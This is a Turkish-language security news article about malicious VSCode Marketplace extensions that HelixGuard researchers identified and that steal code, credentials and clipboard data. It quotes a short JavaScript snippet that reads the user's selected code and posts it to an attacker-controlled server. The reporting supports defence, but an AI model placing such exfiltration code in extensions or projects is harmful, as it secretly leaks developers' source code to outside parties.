Yakın zamanda yapılan bir keşif, Visual Studio Code (VSCode) ekosistemini sarstı ve dünya çapındaki geliştiricileri hedef alan karmaşık bir tedarik zinciri saldırısını açığa çıkardı.
Resmi VSCode Marketplace’te en az bir düzine kötü amaçlı uzantı tespit edildi ve raporlama tarihi itibarıyla dördü aktif durumdaydı.
Bazıları yasal üretkenlik araçları olarak gizlenen bu eklentiler, geliştirici ortamlarına sızarak büyük ölçekli veri sızdırma ve kimlik bilgileri hırsızlığının temelini oluşturdu.
IDE eklentilerine ve yapay zeka destekli kod yardımcılarına artan güven, istemeden de olsa saldırı yüzeyini genişletti ve bu tür platformları, gelişmiş saldırganlar için iştah açıcı hedefler haline getirdi.
Olayın kapsamı, yazılım tedarik zincirinin kırılganlığının altını çiziyor. Bu uzantılar kurulduktan sonra kapsamlı erişime sahip olur ve proje kodunu, hassas verileri ve hatta pano içeriklerini sessizce çalmalarına olanak tanır.
Birçok durumda, kötü amaçlı yükler, saldırgan tarafından kontrol edilen sunucularla kalıcı bağlantılar kurarak güvenilir kodlama ortamlarında etkin bir şekilde gizli arka kapılar görevi görüyor.
Özellikle HelixGuard araştırmacıları, bu saldırıların koordineli doğasını tanımlayan ilk kişiler oldu ve Christine-devops1234.scraper ve Kodease.fyp-23-s2-08 gibi belirli eklentilerin, basit HTTP POST isteklerinden kalıcı soket bağlantılarına kadar çeşitli sızma tekniklerinden yararlandığını vurguladı.
HelixGuard analistleri, bazı varyantların kullanıcı kodunu, yapılandırma dosyalarını ve hatta ortam değişkenlerini aktif olarak izlediğini ortaya çıkardı.
Örneğin bir eklenti, aşağıdaki gibi işlevleri tekrar tekrar çalıştırdı: document.getText(selection) seçilen kaynak kodunu hasat etmek ve sonuçları HTTP aracılığıyla uzak uç noktalara iletmek için:-
let code = document.getText(selection);
code = code.split(" ").join("").toLowerCase();
axios.post('https://attacker-server/app', { code })Uzantılar, bu tür rutin veri toplama işlemlerini görünüşte zararsız arka plan görevlerine yerleştirerek, çoğu temel güvenlik taramasından kaçar.
Bunlar, eklenti kurulumundan aktif veri sızmasına ve uzaktan komut yürütmeye kadar aşamaları yakalayan tipik bir enfeksiyon zinciridir.
Bu kampanyanın gelişmişliği, geliştirici toplulukları arasında artan dikkat, sıkı eklenti incelemesi ve gerçek zamanlı pazar takibine yönelik acil ihtiyacı ortaya koyuyor.
Daha Fazla Anında Güncelleme Almak için Bizi Google Haberler, LinkedIn ve X’te Takip Edin, CSN’yi Google’da Tercih Edilen Kaynak olarak ayarlayın.
